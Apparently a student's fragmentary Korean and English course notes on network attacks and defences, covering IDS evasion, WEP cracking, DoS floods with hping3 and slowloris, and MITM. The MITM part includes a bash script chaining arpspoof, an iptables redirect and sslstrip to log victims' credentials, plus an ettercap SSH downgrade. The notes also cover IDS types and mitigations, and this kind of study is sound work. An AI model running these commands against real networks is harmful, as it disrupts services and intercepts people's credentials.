BA

Scapy.pdf

scapyguide1.pdf

psj05-biondi-en.pdf

To get rid of the info notifications and to be able to use all of the nice features the following libraries need to be installed: gnuplot-py, pycrypto and PyX. And here’s how to do that.

Download and install the latest source of ‘gnuplot-py’ (1.8 during writing):

1
2
3

$ tar xfz gnuplot-py-1.8.tar
$ cd gnuplot-py-1.8
$ sudo python setup.py install

for python 3.x  ->  https://github.com/oblalex/gnuplot.py-py3k

Download and install the latest source of ‘pycrypto’ (2.6.1 during writing):

1
2
3
4

$ wget http://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz
$ tar xfz pycrypto-2.6.1.tar.gz
$ cd pycrypto-2.6.1
$ sudo python setup.py install

Download and install the latest source of ‘PyX’ (0.12.1 during writing):

1
2
3

$ tar xfz PyX-0.12.1.tar.gz
$ cd PyX-0.12.1
$ sudo python setup.py install

All the necessities should be installed now and Scapy should run without any major errors or warnings (besides the warning about IPv6 route, but that’s because I haven’t set IPv6 on this machine). Enjoy your new toy.

namp -sP 192.168.0.0/24

Limitations

• Noise can severely limit an intrusion detection system's effectiveness. Bad packets generated from software bugs, corrupt DNS data, and local packets that escaped can create a significantly high false-alarm rate.^[5]
• It is not uncommon for the number of real attacks to be far below the number of false-alarms. Number of real attacks is often so far below the number of false-alarms that the real attacks are often missed and ignored.^[5]
• Many attacks are geared for specific versions of software that are usually outdated. A constantly changing library of signatures is needed to mitigate threats. Outdated signature databases can leave the IDS vulnerable to newer strategies.^[5]
• For signature-based IDSes there will be lag between a new threat discovery and its signature being applied to the IDS. During this lag time the IDS will be unable to identify the threat.^[2]
• It can not compensate for a weak identification and authentication mechanisms or for weaknesses in network protocols. When an attacker gains access due to weak authentication mechanism then IDS can not prevent the adversary from any malpractise.
• Encrypted packets are not processed by the intrusion detection software. Therefore, the encrypted packet can allow an intrusion to the network that is undiscovered until more significant network intrusions have occurred.
• Intrusion detection software provides information based on the network address that is associated with the IP packet that is sent into the network. This is beneficial if the network address contained in the IP packet is accurate. However, the address that is contained in the IP packet could be faked or scrambled.
• Due to the nature of NIDS systems, and the need for them to analyse protocols as they are captured, NIDS systems can be susceptible to same protocol based attacks that network hosts may be vulnerable. Invalid data and TCP/IP stack attacks may cause an NIDS to crash.Limitations.

Evasion techniques

There are a number of techniques which attackers are using, the following are considered ‘simple’ measures which can be taken to evade IDS:

• Fragmentation: by sending fragmented packets, the attacker will be under the radar and can easily bypass the detection system's ability to detect the attack signature.
• Avoiding defaults: The TCP port utilised by a protocol does not always provide an indication to the protocol which is being transported. For example, an IDS may expect to detect a trojan on port 12345. If an attacker had reconfigured it to use a different port the IDS may not be able to detect the presence of the trojan.
• Coordinated, low-bandwidth attacks: coordinating a scan among numerous attackers (or agents) and allocating different ports or hosts to different attackers makes it difficult for the IDS to correlate the captured packets and deduce that a network scan is in progress.
• Address spoofing/proxying: attackers can increase the difficulty of the ability of Security Administrators to determine the source of the attack by using poorly secured or incorrectly configured proxy servers to bounce an attack. If the source is spoofed and bounced by a server then it makes it very difficult for IDS to detect the origin of the attack.
• Pattern change evasion: IDSs generally rely on ‘pattern matching’ to detect an attack. By changing the data used in the attack slightly, it may be possible to evade detection. For example, an IMAP server may be vulnerable to a buffer overflow, and an IDS is able to detect the attack signature of 10 common attack tools. By modifying the payload sent by the tool, so that it does not resemble the data that the IDS expects, it may be possible to evade detection.

Rogue

내부 내트워크에 관리자의 허가 없이 설치된 AP

위험도로 따지면 최상 

Ad-Hoc

내부네트워크에서 일반적으로 활성화 시키지는 않음 

주로 실수 

Phising AP

1.그냥 AP 만들기 

  위험도는 제일 낮음 

2. 로밍-> 전파세기를 강하게 하여 로밍 시킨다 -> 말이 안 되는 소리 

3. 동일한 SSID, 동일한 환경 일때 로밍됨 -> 암호화 방식, 비밀번호 

-> 암호 알아내기 

WEP/WAP crack 

사전 파일 필요 유무 

쉽다/ 좀 시간이 걸린다 

-> wap는 데이터 50000개 정도를 수집해야 비번을 알아 낼 수 있음

Mac spoof

1. 암호

2. 맥필터 -> 맥을 바꿔 침입하면 충돌 

-> DOS공격하여 대상의 연결을 차단한 후 다른 곳으로 연결되도록 유도

Mis-Config AP

설정이 잘못 된 AP -> rogue AP와 같은 정도의 위험도 

Dos

De-authentication 패킷을 보내서 연결을 끊음 

-> 도스공격을 하려면 동일한 체널을 써야 함

How to Attack

패킷 스니핑하여 암호를 알아냄 

Reconnaissance -> Rogue APs

 -> Open / Misconfigured APs

 -> Ad Hoc stations

Sniffing     -> WEP, WAP, LEAP cracking

   -> Dictionary attacks

   -> Leaky APs

Masquerade      -> MAC spoofing

-> AirSnarf/ HostSpot attacks 

-> Evil Twin /Wi-Phising attacks

Insertion        -> Multicast/ Broadcast injection

  -> Routing cache poisoning

  -> Man in the Middle att  

Denial-of-Service  -> RF jamming -> 주파수 간섭 -> 전화가 안걸림 -> DDOS에 가까운 공격

--------------

anygate 

XM200UA V2

inSSIDer-Installer-2.1.5.1393.msi

----------

WEP crack 

안 쓰는게 좋은 암호화 방식 

128 bit로 늘렸지만 무리수

IV값 

XOR을 두번 하여 복호화 하는 개념 

checksum -> 패킷 변조 여부 확인 

Packet injection -> 데이터 발생 

Tips 

채널 고정

iwconfig wlan0 channel [채널]

모니터링 모드 무선랜 카드 생성

airmon-ng start [무선랜카드]

무선 패킷 캡쳐 및 저장

airodump-ng [무선랜카드]

무선패킷 생성 및 삽입

aireplay-ng [옵션] [무선랜카드]

무선 인증 크랙

aircrack-ng

1. 마스터

-> AP

2. 매니저

-> 랜카드

3. 모니터

-> 모든 공격은 모니터링 모드에서 부터 시작

-> AP도 모니터링 모드로 전환 가능 

IDS(침입 탐지 시스템)

관제 

host based ids -> 백신과 유사 

passive한 특성이 있음

특정 시스템의 상태를 면밀히 검사함

취약성이 알려진 패키지의 설치 여부 등을 검사

시스템 보안 패치의 적용 여부 등을 검사

사용자 패스워드 검사

특정 시스템에 대한 매우 상세한 검사 결과를 얻을 수 있음

network-based 도구에서 얻을 수 없는 취약점을 발견

host-based 취약점 분석 도구 ex) tripwire.NMAP

단점 

특정 기기 또는 기관의 정확한 시스템 구성을 알아야 함

툴의 기능 향상이나 다른 시스템에 적용이 어려움

network based ids -> 

일반적으로 Active한 특성이 있음

이미 알려진 다양한 공격 시나리오를, 점검하고자 하는 시스템에 적용하여 취약점을 검사

다양한 시스템에 대한 취약점 분적이 가능함

특정 기기에 의존하지 않으므로 설치 및 시험이 용이

검사 대상 시스템에 설치할 필요가 없다(현실적으로 중요)

단점

특정 시스템에 대한 정보가 부족하므로 host-based 도구보다 부정확한 결과를 얻을 수 있음

네트워크 동작과 성능에 영향을 줄 수 있다 (dos 등의 점검 시)

침입을 위한 사전 공격 도구로 사용될 가능성 존재

hybrid ids

낮은 버전의 패키지인지 아닌지 탐지 

---------

호스트 기반  H-IDS          

단점      여러 호스트 설치에 따른 비용 증가 

dos 공격에 취약

os종류에 따른 ids제품설치

장점      nids보다 정확한 탐지

backdoor 탐지 가능

서버의 로그 직접 참조

암호화 공격 탐지 가능

특징     감시하고자 하는 호스트에 설치되며, 감사(audit)에 의해서 생성되는 로그를 감시

--------------

네트워크 기반 N-IDS

단점     backdoor탐지 불가

대용량의 네트워크에서 packet 누수현상

암호화 공격 탐지 불가능

장점      네트워크 별 또는 backbone에 설치 함으로써 설치비용 절감

실시간 탐지와 대응

os독립적 구현 및 관리

특징     감시하고자 하는 네트워크에 설치되며, 흘러가는 패킷을 보며 감사를 수행

backbone -> 네트워크에 있는 최상위 스위치 

--------

hybrid-IDS

시스템 보호 및 네트워크 보호를 동시에 수행하며 많은 리소스가 필요하기 때문에 

대용량 네트워크 맞지 않는 시스템

----------------

snort의 특징

source 크기가 작다 

여러 시스템에 porting되어 있다 

configuration 기능이 많다 

rule based 로 탐지 엔진을 갖춘다

rule signature를 형성한다

rule 시스템이 유연하고 새로운 rule의 생성 적용이 간단하다 

시그니처 기반 바이러스, 악성코드 탐지  -> 오탐의 가능성이 있다 

스노트설치사용법.txt

-------------

IPS

Dos

Tear drop

Client가 패킷을 segmentation 시 offset을 어긋나도록 수정하여, 대상 서버가 받은 segmentation 된 패킷을 재조합 하지 못하도록 하여 장애를 발생시키는 공격 기법

-> 조립할 수 없는 상태의 패킷발생 -> 드라이브 장치에서 오류 발생 -> 블루 스크린 

-> 윈도우xp 서비스팩1  업데이트 때 잠깐 생겼다가 없어진 취약점 -> 지금은 안 먹힘 

./teardrop 192.168.0.10 192.168.0.050 -s 100 -t 100 -n 1000

newtear.c

-----------------------

Land Attack 

출발지 IP를 도착IP로 속여 수신단에서 도착지IP가 자신이므로 루핑이 발생하면서 가용성 저하 

-> 말도 안되는 공격이지만 이론상 그렇다고 함 

-> syn 한후 syn +ack가 와야하는데 없으니 안 되는 공격 

-> 아주 아주 예전에는 됐었다고 함 

-> 루프를 돌거라는 생각을 버리기 

-> 루프백 ID를 쓰기 때문에 안 통함 

ip spoofing한 후 hping3 

hping3 192.168.0.20 -a 192.168.0.20 -s 80 -p 80 -S -c 100 

    /-i 

----------------------------

smurf attack

2 tier attack

DDos와 유사한 효과

공격자가 출발지 주소를 조작한 icmp를 3자에게 전송하여 

한번에 많은 양의 icmp reply를 공격 대상에게 보내는 공격

2가지 실현 방법 

hping3

핑을 브로드캐스트로 보내면 응답은 안 옴 -> 1~254 까지 일일이 따로 보내야 함 

-> 스크립트 작성 

smurf2.c

주소 넣어서 bcast 파일작성 

-> 소스 수정이 필요 

IDS /IPS로 방어 가능 

----------------------

DDOS

좀비 호스트를 활용하여 공격 

-> 훔쳐보기 

한정된 자원을 넘치게 하면 답이 없다 

자기 호스트를 좀비화 하여 피씨방가서 공격하는 사람도 있음 

증상이 없음 

현재는 ddos가 xp로 활성화 되어 있음 

서버는 64bit라 좀비화 시키기 쉽지는 않음 

좀비를 퍼뜨릴 수는 없기에 thread타입으로 구현 

도구 

C&C

builder

HOIC 

url -> http:// 까지 써줘야 함 

GET /HTTP/1.0

Accept:*.*

Accept - Language:en

Referer: http://192.168.0.206/xe

User-Agent: Mozilla/4.0~

Host : 192.168..0.206(공격 웹서버)

ddos.zip

방어

IDS/ IPS -> 인지는 하지만 막기는 힘듬

정상적인 경로로 공격이 오면 못 막음 

--------

slowloris Dos

아파치 / http 를 대상으로 함 -> 많은 유저가 있기 때문에 공격 대상이 됨

정상적인 get접속 요청 후 마지막에 하나의 CR_LF를 하지 않아 서버에서 대기한 후 timeout에 도달하거나 무의미한 헤더를 지속적으로 전송

- 네트워크 resource 고갈형 공격

- 호스트 resource 고갈형 공격

0d 0a  -- --

   -> 패킷에서이부분을 삭제 함 -> 계속 기다리게 됨 

./slowloris.pl -dns localhost

방어 

apach 만을 목표러 하기 때문에 다음과 같은 대응을 할 수 있다 

- Timeout 설정 변경(가장 현실적인 방법)

httpd.conf에서 Timeout 300==> 5 이하로 변경 후 httpd reload 

5초 동안 연속된 패킷이 오지 않을 경우 timeout으로 종료함

- netstat -na |grep ESTABLISHED 실행 시 많은 연결이 보이는 IP에 대해

   iptables로 차단(공격이 진행 시 로그는 남지 않아도 netstat 으로는 보이며 

   공격IP는 위조 될 수 없다)

- iptables의 connlimit(커넥션 제한)설정

#iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j DROP

IDS 구축 해보기 

snort

sidejacking 

로그인 해도 바뀌는 화면마다 각기 다른 쿠키가 필요 

-> 정상적인 로그인 계정에만 각기 다른 쿠키를 제공하는 구조 

-> 그때그때마다 쿠키를 가로채기 

-> session hijacking 이랑은 다른 개념

-> 쿠키를 암호화 하지는 않음 -> http이든 https든 상관 없음 -> 값을 넘겨주기만 하면 됨

-> 자체 필터가 필요한 번거로움 

arpspoof -> GW 

fragrouter -> forwarding

ferret -> 특정 패킷 수집, http, https -> pcap형식으로 저장 -> hamster에 전달 

hamster -> 브라우저에서 볼 수 있게끔 ferret에서 받은 패킷 재생 

proxy 서버 -> 거쳐서 지나가게 하기 

firefox proxy loopback 설정 

브라우저에서 hamster 실행

-> 대상이 먼저 네이버 띄워놓고 시작하는게 수월함

-> 공격을 취소를 하고 다시할 때는 pcap이랑 txt파일을 지워줘야 함 -> 초기화 

-> 별도의 스크립트 작성 

간편한 공격 스크립트

.....

...

firefox-bin

killall -9 firefox-bin ferret hamster fragrouter arpspoof

cd /pentest/sniffers/hamster/

rm -rf sniff* hamster.txt

...

...

-> 프로그램이 전부 실행되지 않는 문제해결 필요 

-------

방어 

arpspoofing 방지가 우선 

-> layer2 와 layer3의 중간쯤 되는 공격

-----------

ddos  -> 다구리

dos -> 1:1

대역 차단 -> vpn 돌려 공격

ddos

공격 유형 

1-tier attack

2-tier-attack

-> 다른 호스트의 자원을 이용해서 공격 -> arpspoofing 출발지 변조 -> 핑의 대역 크게 만듬

3-tier-attack

-> 다른나라 거쳐서 공격

좀비툴 감염경로 -> 게임핵툴

     -> 인터넷 첨부파일, 블로그 첨부 파일

     -> 토렌트 

     -> 웹하드 client 프로그램 -> phising 사이트 유도 

           -> 설치하면 자동적으로 깔리게끔 패킷형태로 구성 

     -> etc...

-> 원천 봉쇄 불가 -> 백신 의지 -> 다 잡지는 못함

---------------

ping of death 

hping3 -1 (대상IP) -d (datasize) -i (패킷 전송 속도)

    -i u10.... /u1 -> 위험

   (ICMP)

-> 대용량의 핑을 보냄 

      -> 쪼개서 보내고, 받아서 재조합함 -> 대역폭 고갈

-> 보내는 측도 인터넷이 안되게 될 수 있음 

-> wireshark 뻗을 수 있음 -> 대용량의 핑을 저장하는 결과    

fregmented IP  -> 대용량 icmp 재조합 

ddos는 대상의 방화벽이 뻗을 수 있음 

---------

syn Flooding 

-> 100% 된다는 보장은 없음 

-> 4계층 공격

-> syn 가 사라지지 않게 하기 -> syn을 더이상 받을 수 없게 만들기 

-> 혼자서 공격은 가능하지만 서버를 임의적으로 취약하게 만들어야 함

-> ddos로 하면 또한 막기 힘듬

syn 백로그 -> syn요청을 저장 -> ack가 오면 로그가 사라져야 정상 

ip spoofing -> 없는 ip로 syn flooding 공격 -> 없는 ip ->  서버에서는 syn대기 하게 됨 

-> 조금 기다리다가 사라지지만 그 시간이 지속적으로 누적되어 

     syn 백로그 용량 초과되버림 

hping3 (대상IP)  -a (속이는 source IP) -p (destination port) -S -i u100.../ u10...

        (syn flag전송)

취약하게 값 조정 

echo 32 > /proc/sys/net/ipv4/tcp_max_syn_backlog   //원래는 512

32 -> netstat 했을때 syn_queue를 물고있는 숫자

echo 0>/proc/sys/net/ipv4/tcp_syncookies

-> 취약하게 만들기도 하지만 방어법이기도 함 

방어 

attacker ack packet send time check -> syn을 이렇게 많이 보내는 정상적인 경우는 없음

-> 포트 스캐닝이거나 syn flooding

syn packet intervel ->간격으로 파악하여 정책 조정

IDS/ IPS

그외에 여새는 잘 안먹히는 공격들....

ettercap -G

target1 

-> host -> 상대 윈도우 

target2 

-> ssh접속 서버 -> 상대 리눅스 

arp table을 꼭 확인하고 공격을 하도록 -> arp spoofing이 잘 되어 있는지 확인 

     -> arp redirect 공격이 들어온건 아닌가 확인 

-> ettercap 내에 host scanning 확인 

-> arp spoofing 수동실행하여 arp spoofing 

one-way poison 을 할 경우 잘 적용이 안됨 

putty에서 SSH 2 / 2 only로 할 것인가 

--------

http -> tcp + http -> 암호화 안 됨

https -> tcp + ssl + http -> 암호화 -> 허나 깨졌음 

443 https

https를 강제로 http로 쓰게 만들어 스니핑 

-> 구글 크롬에서는 공격이 안먹힘

https를 요청할때 중간에서 spoofing 하여 다시 대상에게

http로 접속하라고 reply

서버에게도 https reply를 되 돌려줘 버림 -> 대상에게 https를 전송하지만 -> http로 된다 ???

cookie

대량의 세션 유지 

쿠키의 유효기간 

쿠키 가로채기

SSLstrip

파이썬 2.4

구글, 페이스북에도 무선상태에도 됨

스마트폰에도 됨 

echo 1 > /proc/sys/net/ipv4/ip_forward          // fragrouter 의 역할을 함 

-> 값을 1로 덮어써서 forwarding 가능하게 함 -> vim으로는 수정 불가 

arpspoof -i interface -t 정상사용자 IP GWIP

대상 통신 대체 포트 설정

iptables -t nat -A PREROUTEING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

포워딩 -> fragrouter

python sslstrip.py -w [SSL 연결정보 저장할 파일명] -ㅣ [포트]

          [절대경로]      

tail -f secret223    -> 실시간으로 확인 

sslstrip.tar.gz

------

리눅스에서 ftp 사용 

apt-get install filezilla 

없으면 ...

ftp 61.76....

stu2...

비번

cd /p/network/ssl

get 파일명 

------------

나만의 툴 만들기 

#!/bin/bash

echo target ip input:

read target_ip

echo gw ip input:

read gw_ip

echo target ip : $target_ip

echo g w ip: $gw_ip

echo 1 > /proc/sys/net/ipv4/ip_forward    

arpspoof -i eth0 -t $target_ip $gw_ip &

iptables -t nat -A PREROUTEING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

python sslstrip.py -w ./keylog -ㅣ 10000

---------

종료 시키기

killall -9 arpoof python

-----------

**

교육용 소스일뿐 악용시 전적으로 본인의 책임임

**

arp spoofing 방어 

-> static으로 변환 -> 재부팅 할때마다 다시 해야함 -> 관리상 불편 

-> arp -a   -> gateway주소 확인 

-> arp -s    gateway주소     gateway의 MAC주소 

-> 바이러스의 형태로 도는 경우 -> 백신 -> 못잡는 경우도 허다

-> 네트워크에서 MAC주소 모니터링 

-----------

sniffing 

2,3층 장비 -> NAT, 1:1통신, mac, 주소체계  -> sniffing 불가 

promiscuous mode -> winpcap으로 활성화됨 -> 패킷을 볼수 있게 해줌 

hub의 역할 -> 

promiscuous mode -> hub 환경 

   -> ip가 달라도 mac변조로 같은 mac을 자지면 스니핑 가능 

최소한 한번은 기록 되어야 함 -> gateway 핑

데이터 확인은 가능하지만 데이터 복원 불가 -> 데이터를 받는 건 정상적인 길로 전송되기 때문 

A -> 해커 -> C

C -> A

mac flooding 

-> 안되는 공격이다 -> 이미 취약점들이 다 막힌 상태

     switch환경하에 sniffing 

오버플로 -> null을 덮어 써버리는 것 -> 변수 침범

arp table의 기록 범위를 넘겨 버리는것 -> hub로 넘어감 -> 1:1이 아니라 전체에게 보내버림 

-> 안먹히는 공격

-> 양쪽다 spoofing을 해야한다 

--------

arp redirect 

공격자가 GW로 위장하여 네트워크 상에 변조된 정보 broadcast로 전송 

-> arp reply를 broadcast로 보내는 것 

-> 정적으로 -> 공격자는 정상적으로 되도록 

-> fragrouter -B1 -> forwarding -> 전부 인터넷 됨

GW도 spoofing하여야 돌아오는 데이터를 가로챌 수 있음 

-------

arp spoofing 

redirect 

etthercap

mitn 공격을 하기 위한 종합 툴

ssh1,ssl 암호화 sniffing -> 버전에 따라 가용/불가용

-> 베너 확인 

winpcap(윈도우)

 libpcap(리눅스)

unified 

bridged 

arp poisoning

-> 

ICMP redirect

-> 라우터 hop수를 속이기 

port stealing

DHCP spoofing

-> 공격자가  DHCP 역할을 하게 됨 

-> static 쓰면 방어 가능 

ssh 

-> 설치하면 sftp / ssh 둘다 사용 가능하게 됨 

암호 복호화 

공개키 - 누구나 받아서 사용할 수 있는 키

개인키 -  공개키로 암호화해서 보낸 데이터를 해석할 수 있는 키

1. 개인키와 공개키를 만든다

2. 공개키를 공개한다

3. 비밀키를 만든다

4. 공개키로 비밀키를 암호화 한다 

5. 개인키로 비밀키를 해석한다 

6. 비밀키로 데이터를 암호화해 주고 받는다 

-> 개인키가 있어야 데이터를 가로챌수 있는 구조 

공개키의 취약점 -> 개인키, 공개키는 누구나 만들수 있다 

               -> 서버와 대상간에 다른 공개키를 공유하게 만들어 비밀키를 알게 됨

ssh1 (1.51)

-> 취약

ssh (2.00)

-> 패치됨 

ssh (1.99)

-> 취약 버전을 지원하기 때문에 역시 취약 

-> version negotiation 과정이  clear text로 노출되어 위험하다 

** 

etthercap 낮은 버전에서는 간혹 broadcast로 arp reply를 보냄  -> 버그 

희생자가 되지 위한 열악한 환경 조성 

vi /etc/ssh/sshd.config

-> 버전 재설정 가능, 21줄

-> protocol 1,2

다른 호스트에서 

-> telnet으로 22포트로 접속하여 베너 확인 

cd /usr/share/ettercap/ 이동

ettherfiler etter.filter.ssh -o etter.filter.ssh.co

-----------